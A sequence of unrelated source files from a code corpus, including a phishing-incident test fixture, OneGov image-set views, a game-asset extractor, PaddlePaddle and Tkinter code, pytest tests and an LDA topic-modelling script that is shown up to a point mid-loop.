"severity": 0,
"similarity": 0.9999999999999999,
"status": 1
},
{
"emailfrom": "[email protected]",
"emailfromdomain": "example.com",
"id": "3",
"name": "Verify your example account 798",
"occurred": "2021-11-21T15:00:07.425185504Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 3,
"similarity": 1,
"status": 1
}
],
"indicators": [
{
"id": "1263",
"value": "http://www.example.com"
}
],
"involvedIncidentsCount": 3,
"isCampaignFound": True
},
"ExistingCampaignID": [
"809"
]
}
NEW_EMPTY_CAMPAIGN = {}
INCIDENTS_BY_ID = {'0': CAMPAIGN_INCIDENT_CONTEXT, '1': NEW_EMPTY_CAMPAIGN, '3': OLD_INCIDENT_CONTEXT,
'4': NEW_INCIDENT_2_CONTEXT, '5': NEW_INCIDENT_CONTEXT}
| 33.592715 | 102 | 0.407097 |
9cb14aa80590cf8030edff4c353c93a4cee816cd
| 4,539 |
py
|
Python
|
src/onegov/org/views/imagesets.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/org/views/imagesets.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/org/views/imagesets.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
import morepath
from onegov.core.security import Public, Private
from onegov.file import File
from onegov.org import _, OrgApp
from onegov.org.elements import Link
from onegov.org.forms import ImageSetForm
from onegov.org.layout import ImageSetLayout, ImageSetCollectionLayout
from onegov.org.models import (
ImageFile,
ImageSet,
ImageSetCollection,
ImageFileCollection
)
from purl import URL
from unidecode import unidecode
def get_form_class(self, request):
if isinstance(self, ImageSetCollection):
model = ImageSet()
else:
model = self
return model.with_content_extensions(ImageSetForm, request)
@OrgApp.html(model=ImageSetCollection, template='imagesets.pt',
permission=Public)
def view_imagesets(self, request, layout=None):
# XXX add collation support to the core (create collations automatically)
imagesets = self.query().all()
imagesets = sorted(imagesets, key=lambda d: unidecode(d.title))
return {
'layout': layout or ImageSetCollectionLayout(self, request),
'title': _("Photo Albums"),
'imagesets': request.exclude_invisible(imagesets)
}
@OrgApp.html(model=ImageSet, name='select', template='select_images.pt',
permission=Private, request_method='GET')
def select_images(self, request, layout=None):
collection = ImageFileCollection(request.session)
selected = {f.id for f in self.files}
def produce_image(id):
return {
'id': id,
'src': request.class_link(File, {'id': id}, 'thumbnail'),
'selected': id in selected
}
images = [
{
'group': request.translate(group),
'images': tuple(produce_image(id) for group, id in items)
} for group, items in collection.grouped_by_date()
]
layout = layout or ImageSetLayout(self, request)
layout.breadcrumbs.append(Link(_("Select"), '#'))
action = URL(request.link(self, 'select')).query_param(
'csrf-token', request.new_csrf_token())
return {
'layout': layout,
'title': _("Select images"),
'images': images,
'action': action
}
@OrgApp.html(model=ImageSet, name='select', template='select_images.pt',
permission=Private, request_method='POST')
def handle_select_images(self, request):
# we do custom form handling here, so we need to check for CSRF manually
request.assert_valid_csrf_token()
if not request.POST:
self.files = []
else:
self.files = request.session.query(ImageFile)\
.filter(ImageFile.id.in_(request.POST)).all()
request.success(_("Your changes were saved"))
return morepath.redirect(request.link(self))
@OrgApp.form(model=ImageSetCollection, name='new', template='form.pt',
permission=Private, form=get_form_class)
def handle_new_imageset(self, request, form, layout=None):
if form.submitted(request):
imageset = self.add(title=form.title.data)
form.populate_obj(imageset)
request.success(_("Added a new photo album"))
return morepath.redirect(request.link(imageset))
layout = layout or ImageSetCollectionLayout(self, request)
layout.include_editor()
layout.breadcrumbs.append(Link(_("New"), '#'))
return {
'layout': layout,
'title': _("New Photo Album"),
'form': form,
}
@OrgApp.form(model=ImageSet, name='edit', template='form.pt',
permission=Private, form=get_form_class)
def handle_edit_imageset(self, request, form, layout=None):
if form.submitted(request):
form.populate_obj(self)
request.success(_("Your changes were saved"))
return morepath.redirect(request.link(self))
elif not request.POST:
form.process(obj=self)
layout = layout or ImageSetLayout(self, request)
layout.include_editor()
layout.breadcrumbs.append(Link(_("Edit"), '#'))
return {
'layout': layout,
'title': self.title,
'form': form
}
@OrgApp.view(model=ImageSet, request_method='DELETE', permission=Private)
def handle_delete_imageset(self, request):
request.assert_valid_csrf_token()
collection = ImageSetCollection(request.session)
collection.delete(self)
@OrgApp.html(model=ImageSet, template='imageset.pt', permission=Public)
def view_imageset(self, request, layout=None):
return {
'layout': layout or ImageSetLayout(self, request),
'title': self.title,
'imageset': self
}
| 28.910828 | 77 | 0.667548 |
9cd7843ba6ddf96feac2b4041d2fbfea8c209aad
| 417 |
py
|
Python
|
doc/examples/using_jit_diff_types.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 88 |
2019-01-08T16:39:08.000Z
|
2022-02-06T14:19:23.000Z
|
doc/examples/using_jit_diff_types.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 13 |
2019-06-20T15:53:10.000Z
|
2021-02-09T11:03:29.000Z
|
doc/examples/using_jit_diff_types.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 1 |
2019-11-05T03:03:14.000Z
|
2019-11-05T03:03:14.000Z
|
from transonic import jit, Type
T = Type(int, float)
@jit()
def func(a: T, b: T):
return a * b
if __name__ == "__main__":
from time import sleep
a_i = b_i = 1
a_f = b_f = 1.0
for _ in range(10):
print(_, end=",", flush=True)
func(a_i, b_i)
sleep(1)
print()
for _ in range(10):
print(_, end=",", flush=True)
func(a_f, b_f)
sleep(1)
| 14.37931 | 37 | 0.508393 |
9ce7112e3604b827cf80c10d2509ef0d153fd9a1
| 3,778 |
py
|
Python
|
extract_q.py
|
hoehermann/YDKJ4JS
|
077013baf4299767954370482361cba952d0c16a
|
[
"MIT"
] | 2 |
2021-10-02T00:16:17.000Z
|
2022-02-17T17:27:47.000Z
|
extract_q.py
|
hoehermann/YDKJ4JS
|
077013baf4299767954370482361cba952d0c16a
|
[
"MIT"
] | null | null | null |
extract_q.py
|
hoehermann/YDKJ4JS
|
077013baf4299767954370482361cba952d0c16a
|
[
"MIT"
] | null | null | null |
import sys
import re
import subprocess
import json
import os
import argparse
sid_re = re.compile('exports ([0-9]+) as "([^"]+)"')
smap_re = re.compile('Push String:"(S[^"]+)".*String:"(A[^"]+)"')
actionstring_re = re.compile('Push String:"_(?P<key>.+)" String:"(?P<value>.+)"')
def extract_assets(dat_filename, outpath):
question = {'audio': {}}
swfdump_args = ['swfdump', '-a', dat_filename]
swfdump_process = subprocess.run(swfdump_args, stdout=subprocess.PIPE, encoding='utf-8', check=True)
swfdump = swfdump_process.stdout
for swfdump_line in swfdump.split('\n'):
# extract audio information
sid = sid_re.search(swfdump_line)
if (sid):
sound_id = sid.group(1)
sound_name = sid.group(2)
question['audio'][sound_name] = (sound_id,)
else:
smap = smap_re.search(swfdump_line)
if (smap):
sound_name = smap.group(1)
sound_application = smap.group(2)
(sound_id,) = question['audio'][sound_name]
question['audio'][sound_name] = (sound_application, sound_id)
else:
# extract question texts
actionstring_match = actionstring_re.search(swfdump_line)
if (actionstring_match):
key = actionstring_match.group('key')
value = actionstring_match.group('value')
question[key] = value
for sound_name, appid in question['audio'].items():
if (len(appid) > 1):
sound_application, sound_id = appid
else:
(sound_id,) = appid
sound_application = sound_name
sound_filename = f'{outpath}/{sound_application}.mp3'
# extract audio file
if (not os.path.isfile(sound_filename)):
os.makedirs(outpath, exist_ok=True)
swfextract_args = ['swfextract', '-o', sound_filename, '-s', sound_id, dat_filename]
subprocess.run(swfextract_args, check=True)
question['audio'] = {appid[0]: name for name, appid in question['audio'].items()}
return question
# if main
parser = argparse.ArgumentParser(description='Extract YDKJ 4 (German Edition) assets.')
parser.add_argument('--input', type=str, required=True, help="Path to installation root. Must contain lib/q/qlist.dat.")
parser.add_argument('--output', type=str, required=True, help="Directory for output.")
parser.add_argument('--max_items', type=int, default=0)
args = parser.parse_args()
input_path_q = args.input+'/lib/q'
if (os.path.isdir(input_path_q)):
qlist_path = input_path_q+'/qlist.dat'
with open(qlist_path, 'r') as qlistfile:
questions = []
qid_re = re.compile('(?<=id=")[^"]{3}')
tid_re = re.compile('(?<=t=").')
for qlistline in qlistfile:
tid_match = tid_re.search(qlistline)
qid_match = qid_re.search(qlistline)
if (tid_match and qid_match):
tid = tid_match.group(0)
if (tid != 's'):
# only shorties for now
continue
qid = qid_match.group(0)
dat_filename = f'{input_path_q}/{qid}.dat'
asset_path = f'{args.output}/{qid}'
question = extract_assets(dat_filename, asset_path)
question['t'] = tid
questions.append(question)
sys.stderr.write('.')
sys.stderr.flush()
if (args.max_items and len(questions) >= args.max_items):
sys.stderr.write('\nMaximum count of items reached. Stopping prematurely.')
break
sys.stderr.write('\n')
print(json.dumps(questions, ensure_ascii=False, indent=2))
else:
print(extract_assets(args.input, args.output))
| 42.449438 | 120 | 0.597935 |
1470b74d57070c459c579edd8ffa56d8aac38b93
| 5,655 |
py
|
Python
|
deprecated/benchmark/ps/semantic_matching/nets.py
|
hutuxian/FleetX
|
843c7aa33f5a14680becf058a3aaf0327eefafd4
|
[
"Apache-2.0"
] | 170 |
2020-08-12T12:07:01.000Z
|
2022-03-07T02:38:26.000Z
|
deprecated/benchmark/ps/semantic_matching/nets.py
|
hutuxian/FleetX
|
843c7aa33f5a14680becf058a3aaf0327eefafd4
|
[
"Apache-2.0"
] | 195 |
2020-08-13T03:22:15.000Z
|
2022-03-30T07:40:25.000Z
|
deprecated/benchmark/ps/semantic_matching/nets.py
|
hutuxian/FleetX
|
843c7aa33f5a14680becf058a3aaf0327eefafd4
|
[
"Apache-2.0"
] | 67 |
2020-08-14T02:07:46.000Z
|
2022-03-28T10:05:33.000Z
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle.fluid as fluid
const_var=fluid.layers.fill_constant_batch_size_like
param_config=fluid.ParamAttr
pooling=fluid.layers.sequence_pool
elem_sub=fluid.layers.elementwise_sub
elem_add=fluid.layers.elementwise_add
def get_global_pn(pos_score, neg_score):
wrong = fluid.layers.cast(
fluid.layers.less_than(pos_score, neg_score), dtype='float32')
wrong_cnt = fluid.layers.reduce_sum(wrong)
right = fluid.layers.cast(
fluid.layers.less_than(neg_score, pos_score), dtype='float32')
right_cnt = fluid.layers.reduce_sum(right)
global_right_cnt = fluid.default_startup_program().global_block().create_var(
name="right_cnt", dtype=fluid.core.VarDesc.VarType.FP32, shape=[1], persistable=True,
initializer=fluid.initializer.Constant(value=float(0), force_cpu=True))
global_wrong_cnt = fluid.default_startup_program().global_block().create_var(
name="wrong_cnt", dtype=fluid.core.VarDesc.VarType.FP32, shape=[1], persistable=True,
initializer=fluid.initializer.Constant(value=float(0), force_cpu=True))
fluid.default_main_program().global_block().create_var(
name="right_cnt", dtype=fluid.core.VarDesc.VarType.FP32, shape=[1], persistable=True)
fluid.default_main_program().global_block().create_var(
name="wrong_cnt", dtype=fluid.core.VarDesc.VarType.FP32, shape=[1], persistable=True)
#fluid.layers.Print(global_right_cnt)
#fluid.layers.Print(global_wrong_cnt)
global_right_cnt.stop_gradient = True
global_wrong_cnt.stop_gradient = True
fluid.default_main_program().global_block().append_op(
type='elementwise_add', inputs={'X':[global_right_cnt], 'Y':[right_cnt]},
outputs={'Out':[global_right_cnt]})
fluid.default_main_program().global_block().append_op(
type='elementwise_add', inputs={'X':[global_wrong_cnt], 'Y':[wrong_cnt]},
outputs={'Out':[global_wrong_cnt]})
pn = fluid.layers.elementwise_div(global_right_cnt, global_wrong_cnt)
return global_right_cnt, global_wrong_cnt, pn
def get_pn(pos_score, neg_score):
"""acc"""
wrong = fluid.layers.cast(
fluid.layers.less_than(pos_score, neg_score), dtype='float32')
wrong_cnt = fluid.layers.reduce_sum(wrong)
right = fluid.layers.cast(
fluid.layers.less_than(neg_score, pos_score), dtype='float32')
right_cnt = fluid.layers.reduce_sum(right)
pn = fluid.layers.elementwise_div(right_cnt, wrong_cnt)
return right_cnt, wrong_cnt, pn
def bow_encoder(query, pos_title, neg_title,
dict_dim, emb_dim, hid_dim,
emb_lr, fc_lr, margin):
q_emb = fluid.layers.embedding(
input=query,
size=[dict_dim, emb_dim],
param_attr=param_config(
name="__emb__",
learning_rate=emb_lr),
is_sparse=True)
pt_emb = fluid.layers.embedding(
input=pos_title,
size=[dict_dim, emb_dim],
param_attr=param_config(
name="__emb__",
learning_rate=emb_lr),
is_sparse=True)
nt_emb = fluid.layers.embedding(
input=neg_title,
size=[dict_dim, emb_dim],
param_attr=param_config(
name="__emb__",
learning_rate=emb_lr),
is_sparse=True)
q_sum = pooling(input=q_emb, pool_type='sum')
pt_sum = pooling(input=pt_emb, pool_type='sum')
nt_sum = pooling(input=nt_emb, pool_type='sum')
q_ss = fluid.layers.softsign(q_sum)
pt_ss = fluid.layers.softsign(pt_sum)
nt_ss = fluid.layers.softsign(nt_sum)
q_fc = fluid.layers.fc(
input=q_ss,
size=hid_dim,
param_attr=param_config(
name="__q_fc__",
learning_rate=fc_lr),
bias_attr=param_config(
name="__q_fc_b__"))
pt_fc = fluid.layers.fc(
input=pt_ss,
size=hid_dim,
param_attr=param_config(
name="__fc__",
learning_rate=fc_lr),
bias_attr=param_config(
name="__fc_b__"))
nt_fc = fluid.layers.fc(
input=nt_ss,
size=hid_dim,
param_attr=param_config(
name="__fc__",
learning_rate=fc_lr),
bias_attr=param_config(
name="__fc_b__"))
cos_q_pt = fluid.layers.cos_sim(q_fc, pt_fc)
cos_q_nt = fluid.layers.cos_sim(q_fc, nt_fc)
margin_var = const_var(input=cos_q_pt,
shape=[-1, 1],
value=margin,
dtype='float32')
margin_minus_qt = elem_sub(margin_var, cos_q_pt)
margin_minus_nt = elem_add(margin_minus_qt, cos_q_nt)
zero_var = const_var(input=margin_minus_nt,
shape=[-1, 1],
value=0.0,
dtype='float32')
loss = fluid.layers.elementwise_max(
zero_var, margin_minus_nt)
avg_cost = fluid.layers.mean(loss)
pnum, nnum, pn = get_global_pn(cos_q_pt, cos_q_nt)
return avg_cost, cos_q_pt, cos_q_nt, pnum, nnum, pn
| 36.019108 | 93 | 0.663484 |
0d24e4d636a87ef845937fbdeee17cf92953a7ef
| 6,403 |
py
|
Python
|
20-fs-ias-lec/groups/03-subChat/Prototyp/UI.py
|
Kyrus1999/BACnet
|
5be8e1377252166041bcd0b066cce5b92b077d06
|
[
"MIT"
] | 8 |
2020-03-17T21:12:18.000Z
|
2021-12-12T15:55:54.000Z
|
20-fs-ias-lec/groups/03-subChat/Prototyp/UI.py
|
Kyrus1999/BACnet
|
5be8e1377252166041bcd0b066cce5b92b077d06
|
[
"MIT"
] | 2 |
2021-07-19T06:18:43.000Z
|
2022-02-10T12:17:58.000Z
|
20-fs-ias-lec/groups/03-subChat/Prototyp/UI.py
|
Kyrus1999/BACnet
|
5be8e1377252166041bcd0b066cce5b92b077d06
|
[
"MIT"
] | 25 |
2020-03-20T09:32:45.000Z
|
2021-07-18T18:12:59.000Z
|
from tkinter import *
import datetime
import threading
import feed
import pcap
import string
import crypto
import event
import os
global username
class Chat(Frame):
def save(self, contend):
feed._appendIt(self.username, 'append', contend)
def add(self, username, contend, event=None):
self.time = datetime.datetime.now()
if username != self.username: # user updated
try:
print("getting message from " + self.getPartner() + ":")
self.listBox.insert('end', '[' + self.time.strftime("%H:%M:%S") + '] ' + username + ': ' + contend)
except:
print("no new messages available from " + self.getPartner())
else: # user typed something
lastEntry = ''
try:
index = 0
ContendArray = pcap.dumpIt(username + '.pcap')
while True: # while not at the end of the list (we want to get the last entry)
try:
lastEntry = ContendArray[index+1]
lastEntry = lastEntry[2: len(ContendArray[index+1]) - 2] #removing the [""]
index += 1
except:
print("Arrived at last message: \"" + lastEntry + "\"")
if contend != '':
self.listBox.insert('end', '[' + self.time.strftime("%H:%M:%S") + '] ' + username + ': ' + contend)
self.text_field.delete(0, 'end')
self.save(contend)
break
except:
print("Something went wrong...")
def updateContend(self, fromUser):
#ContendArray = pcap.dumpIt(fromUser + '.pcap')
#print(ContendArray[self.alreadyUpdatedIndex+1])
while True:
try:
print(pcap.dumpIt(fromUser + '.pcap')[self.alreadyUpdatedIndex+1])
self.add(fromUser, pcap.dumpIt(fromUser + '.pcap')[self.alreadyUpdatedIndex+1])
self.alreadyUpdatedIndex += 1
except:
print("No new messages found from: " + self.getPartner())
break
def getPartner(self):
if self.username == 'alice':
return 'bob'
else:
return 'alice'
def createWidgets(self):
print("connected as: \"" + self.username + "\"")
self.canvas = Canvas(self.master, width=800, height=1100) # , bg='#4f4f4f')
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
self.canvas.grid(column=0, row=0, columnspan=2, sticky=N + S + E + W)
self.username_label = Label(self.canvas, text="connected as: " + self.username)
self.username_label.grid(column=0, row=0, sticky=N + S + E + W)
self.scrollbar = Scrollbar(self.canvas, orient="vertical", command=self.canvas.yview)
self.listBox = Listbox(self.canvas, height=30, width=50, yscrollcommand=self.scrollbar.set)
self.scrollbar.grid(column=2, row=0, sticky='ns')
self.listBox.grid(column=0, row=1, sticky=N + S + E + W)
self.text_field = Entry(self.canvas, textvariable=self.msg)
self.text_field.bind('<Return>', lambda event: self.add(self.username, self.msg.get()))
self.text_field.grid(column=0, row=2, sticky=N + S + E + W)
self.send_button = Button(self.canvas, text='Send', command=lambda: self.add(self.username, self.msg.get()))
self.send_button.grid(column=0, row=3, sticky=N + S + E + W)
self.update_button = Button(self.canvas, text='Update', command=lambda: self.updateContend(self.getPartner()),
bg='white')
self.update_button.grid(column=0, row=4, sticky=N + S + E + W)
def __init__(self, master=None):
global username
Frame.__init__(self, master)
master.title("Subjective Chat")
self.msg = StringVar()
self.username = username
self.partner = StringVar()
self.alreadyUpdatedIndex = 0
self.time = datetime.datetime.now()
self.createWidgets()
class Login(Frame):
def open_Chat(self):
root2 = Toplevel()
app2 = Chat(root2)
def chooseUsername(self, name):
global username
username = name
self.open_Chat()
def choseUsername(self): # ToDo: if one wants to choose a custom username
if not feed.checkKey(self.msg.get()+'.key'):
feed._appendIt(self.msg.get(), 'create', '')
if not pcap.checkPcap(self.msg.get()):
pass
self.text_field.delete(0, 'end')
self.chooseUsername(self.msg.get())
def adjust(self, name):
if name[0] == 'b' or name[0] =='B':
self.chooseUsername('bob')
else:
self.chooseUsername('alice')
def createWidgets(self):
self.canvas = Canvas(self.master, width=400, height=300) # , bg='#4f4f4f')
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
self.canvas.grid(column=0, row=0, columnspan=2, sticky=N + S + E + W)
self.username_label = Label(self.canvas, text='Choose a username:')
self.username_label.grid(column=0, row=0, sticky=N + S + E + W)
self.bob_button = Button(self.canvas, text='Bob', command=lambda: self.chooseUsername('bob'))
self.bob_button.grid(column=0, row=1, sticky=N + S + E + W)
self.bob_button = Button(self.canvas, text='Alice', command=lambda: self.chooseUsername('alice'))
self.bob_button.grid(column=0, row=2, sticky=N + S + E + W)
self.username_label = Label(self.canvas, text='\nChoose a username manually:')
self.username_label.grid(column=0, row=3, sticky=N + S + E + W)
self.text_field = Entry(self.canvas, textvariable=self.msg)
self.text_field.bind('<Return>', lambda event: self.adjust(self.msg.get()))
self.text_field.grid(column=0, row=4, sticky=N + S + E + W)
self.send_button = Button(self.canvas, text='choose', command=lambda: self.adjust(self.msg.get()))
def __init__(self, master=None):
Frame.__init__(self, master)
master.title("Login")
self.msg = StringVar()
self.createWidgets()
root = Tk()
app = Login(master=root)
try:
root.mainloop()
root.destroy()
root.close()
except:
pass
| 39.524691 | 127 | 0.577386 |
b4ed1f9c08b3d97636868474b48c6b33ed05f66c
| 560 |
py
|
Python
|
main.py
|
Nukesor/ilswach-bot
|
2e3e9dfa8f43b07caab79f2e94686557dc808731
|
[
"MIT"
] | null | null | null |
main.py
|
Nukesor/ilswach-bot
|
2e3e9dfa8f43b07caab79f2e94686557dc808731
|
[
"MIT"
] | null | null | null |
main.py
|
Nukesor/ilswach-bot
|
2e3e9dfa8f43b07caab79f2e94686557dc808731
|
[
"MIT"
] | null | null | null |
#!/bin/env python
"""Start the bot."""
from ilswbot.ilswbot import updater
from ilswbot.config import config
if config['webhook']['enabled']:
updater.start_webhook(
listen='127.0.0.1',
port=config['webhook']['port'],
url_path=config['webhook']['token'],
)
domain = config['webhook']['domain']
token = config['webhook']['token']
updater.bot.set_webhook(url=f'{domain}{token}',
certificate=open(config['webhook']['cert_path'], 'rb'))
else:
updater.start_polling()
updater.idle()
| 26.666667 | 83 | 0.610714 |
2ee3ec79f4dde5dcaa341328384d0337c62fc38c
| 1,234 |
py
|
Python
|
Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch03_recursion/ex08_power_test.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch03_recursion/ex08_power_test.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch03_recursion/ex08_power_test.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
# Beispielprogramm für das Buch "Python Challenge"
#
# Copyright 2020 by Michael Inden
import pytest
from ch03_recursion.solutions.ex08_power_of import is_power_of_2, power_of_iterative, power_of, power_of_optimized
@pytest.mark.parametrize("value, expected",
[(2, True), (3, False), (4, True),
(10, False), (16, True)])
def test_is_power_of2(value, expected):
assert is_power_of_2(value) == expected
def inputs_and_expected():
return [(2, 2, 4), (4, 2, 16), (16, 2, 256),
(4, 4, 256), (2, 8, 256), (3, 3, 27)]
@pytest.mark.parametrize("number, exponent, expected",
inputs_and_expected())
def test_power_of(number, exponent, expected):
assert power_of(number, exponent) == expected
@pytest.mark.parametrize("number, exponent, expected",
inputs_and_expected())
def test_power_of_optimized(number, exponent, expected):
assert power_of_optimized(number, exponent) == expected
@pytest.mark.parametrize("number, exponent, expected",
inputs_and_expected())
def test_power_of_iterative(number, exponent, expected):
assert power_of_iterative(number, exponent) == expected
| 32.473684 | 114 | 0.659643 |
25ec149731928cd321f749e90b9c1f238cd4bac0
| 10,121 |
py
|
Python
|
task_1/data_investigation/lda_topic_modeling.py
|
strumswell/sentiment-apple-events
|
b6f4f7799374aba757874f5426b3a2c1bf7d29b5
|
[
"MIT"
] | 1 |
2022-02-28T22:02:50.000Z
|
2022-02-28T22:02:50.000Z
|
task_1/data_investigation/lda_topic_modeling.py
|
strumswell/sentiment-apple-events
|
b6f4f7799374aba757874f5426b3a2c1bf7d29b5
|
[
"MIT"
] | null | null | null |
task_1/data_investigation/lda_topic_modeling.py
|
strumswell/sentiment-apple-events
|
b6f4f7799374aba757874f5426b3a2c1bf7d29b5
|
[
"MIT"
] | null | null | null |
# %% Do LDA Topic Modeling
# Imports
from sklearn.decomposition import LatentDirichletAllocation as LDA
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.model_selection import GridSearchCV
import pandas as pd
# %% Import Cleaned Documents
events = ['2020_Nov_Post', '2020_Nov', '2020_Nov_Pre', '2020_Oct_Post', '2020_Oct', '2020_Oct_Pre', '2020_Sept_Post', '2020_Sept', '2020_Sept_Pre', '2020_Jun_Post', '2020_Jun', '2020_Jun_Pre', '2019_Sept_Post', '2019_Sept', '2019_Sept_Pre', '2019_Jun', '2019_Jun_Pre', '2019_Mar_Post', '2019_Mar', '2019_Mar_Pre', '2018_Oct_Post', '2018_Oct', '2018_Oct_Pre', '2018_Sept_Post', '2018_Sept', '2018_Sept_Pre', '2018_Jun_Post', '2018_Jun', '2018_Jun_Pre', '2018_Mar']
dfs = []
for event in events:
dfs.append(pd.read_csv("../../data/cleaned/"+event+"_CleanedData.csv"))
comments_per_event = dict(zip(events, [[str(comment) for comment in df['Body'].values] for df in dfs]))
# %% Remove custom filter words
for event in comments_per_event:
filter_list = ['nan', 'appl']
cleaned_comments = [' '.join([word for word in comment.split() if str(word) not in filter_list]) for comment in comments_per_event[event]]
comments_per_event[event] = cleaned_comments
# %% Prepare lda dict
lda_data = {}
# %% Find optimal Topic number via Coherence Scores
import gensim.corpora as corpora
import gensim
import matplotlib.pyplot as plt
lda_events = ["2020_Nov_Pre", "2019_Mar_Pre", "2018_Sept_Pre", "2020_Nov", "2019_Sept", "2018_Oct"]
for event in lda_events:
# Results for specific topic
result_scores = [] # coherence scores for different lda models
result_models = [] # different lda models (per topic nr)
print("Doing " + event)
comments = [[word for word in comment.split() if len(word) > 1] for comment in comments_per_event[event]]
id2word = corpora.Dictionary(comments)
corpus = [id2word.doc2bow(comment) for comment in comments]
topics = [*range(2, 11)] # 2 ... 10
# Create lda model for each number of topics
for topic in topics:
passes = 20
iterations = 100
eval_every = 1
lda_model = gensim.models.LdaModel(corpus=corpus, id2word=id2word, \
alpha='auto', eta='auto', \
iterations=iterations, num_topics=topic, \
passes=passes, eval_every=eval_every)
result_models.append(lda_model)
coherence_model_lda = gensim.models.CoherenceModel(model=lda_model, corpus=corpus, dictionary=id2word, coherence='u_mass')
coherence_lda = coherence_model_lda.get_coherence()
result_scores.append(coherence_lda)
print(" |___ " + str(topic) + ": " + str(coherence_lda))
# Keep results for event
lda_data[event] = {
"topics": topics,
"scores": result_scores,
"models": result_models,
"corpus": corpus,
"id2word": id2word}
# %% Plot Coherence Scores per Event
fig, axes = plt.subplots(3, 2, figsize=(10,10))
fig.suptitle('Coherence Scores for Prominent Events')
for i, event in enumerate(lda_data):
ax = axes.flatten()[i]
fig.add_subplot(ax)
ax.set(xlabel='Topics', ylabel='Coherence Score (u_mass)', title=event)
ax.plot(range(2, 11), lda_data[event]['scores'])
plt.tight_layout()
plt.show()
#plt.savefig('coherence_scores.pdf')
# %% Generate WordCloud per Topic
# https://www.machinelearningplus.com/nlp/topic-modeling-visualization-how-to-present-results-lda-models/#6.-What-is-the-Dominant-topic-and-its-percentage-contribution-in-each-document
from matplotlib import pyplot as plt
from wordcloud import WordCloud
import matplotlib.colors as mcolors
cols = [color for name, color in mcolors.TABLEAU_COLORS.items()]
cloud = WordCloud(background_color='white',
width=2500,
height=1800,
max_words=15,
colormap='tab10',
color_func=lambda *args, **kwargs: cols[i],
prefer_horizontal=1.0)
for event in lda_data:
# Find best lda model (min coherence score)
best_model_index = lda_data[event]['scores'].index(min(lda_data[event]['scores']))
lda_model = lda_data[event]['models'][best_model_index]
# Get 15 most frequent words of topics
topics = lda_model.show_topics(num_words=15, formatted=False)
fig, axes = plt.subplots(4, 3, figsize=(10,10), sharex=True, sharey=True)
fig.suptitle('Topic WordClouds for ' + event )
for i, ax in enumerate(axes.flatten()):
fig.add_subplot(ax)
if (i <= best_model_index + 1):
topic_words = dict(topics[i][1])
cloud.generate_from_frequencies(topic_words, max_font_size=300)
plt.gca().imshow(cloud)
plt.gca().set_title('Topic ' + str(i+1), fontdict=dict(size=16))
plt.gca().axis('off')
plt.subplots_adjust(wspace=0, hspace=0)
plt.axis('off')
plt.margins(x=0, y=0)
plt.tight_layout()
plt.show()
#plt.savefig('topic_clouds_' + event + ".pdf")
# %% Investigation of Topics via pyLDAvis (optional)
import pyLDAvis.gensim
best_model_index = lda_data['2020_Nov']['scores'].index(min(lda_data['2020_Nov']['scores']))
lda_model = lda_data['2020_Nov']['models'][best_model_index]
lda_visualization = pyLDAvis.gensim.prepare(lda_model, lda_data['2020_Nov']['corpus'], lda_data['2020_Nov']['id2word'], sort_topics=True)
pyLDAvis.display(lda_visualization)
############### Sentiment Analysis of each Topic ###############
# %% Import uncleaned Documents
dfs_uncleaned = []
for event in events:
dfs_uncleaned.append(pd.read_csv("../../data/unprocessed/"+event+"_Data.csv"))
comments_per_event_uncleaned = dict(zip(events, [[str(comment) for comment in df['Body'].values] for df in dfs_uncleaned]))
# %% Sort comments into correct topics
ordered_documents = {}
for event in lda_data:
document_topics = lda_model.get_document_topics(lda_data[event]['corpus'])
ordered_document = {0: [], 1: [], 2: [], 3: [], 4: [], 5: [], 6: [], 7: [], 8: [], 9: []}
best_model_index = lda_data[event]['scores'].index(min(lda_data[event]['scores']))
lda_model = lda_data[event]['models'][best_model_index]
for i, comment_ratings in enumerate(lda_model.get_document_topics(lda_data[event]['corpus'])):
for rating in comment_ratings:
# Only save ratings of over 30% certainty that this comment belongs to this topic
if rating[1] > 0.3:
# Save index of comment
ordered_document[rating[0]].append(i)
ordered_documents[event] = ordered_document
# %% Generate sentiments
from nrclex import NRCLex
sentiment_results = {}
for event in ordered_documents:
print(event)
topics_positive_scores = []
topics_negative_scores = []
topic_labels = []
for topic in ordered_documents[event]:
if (len(ordered_documents[event][topic]) < 1): continue
topic_labels.append(topic + 1)
# Generate emotions per comments and store their result
overall_scores = {'fear': 0.0, 'anger': 0.0, 'anticip': 0.0 ,'anticipation': 0.0, 'trust': 0.0, 'surprise': 0.0, 'positive': 0.0, 'negative': 0.0, 'sadness': 0.0, 'disgust': 0.0, 'joy': 0.0}
# Use index to find corresponding uncleand comment
for commend_id in ordered_documents[event][topic]:
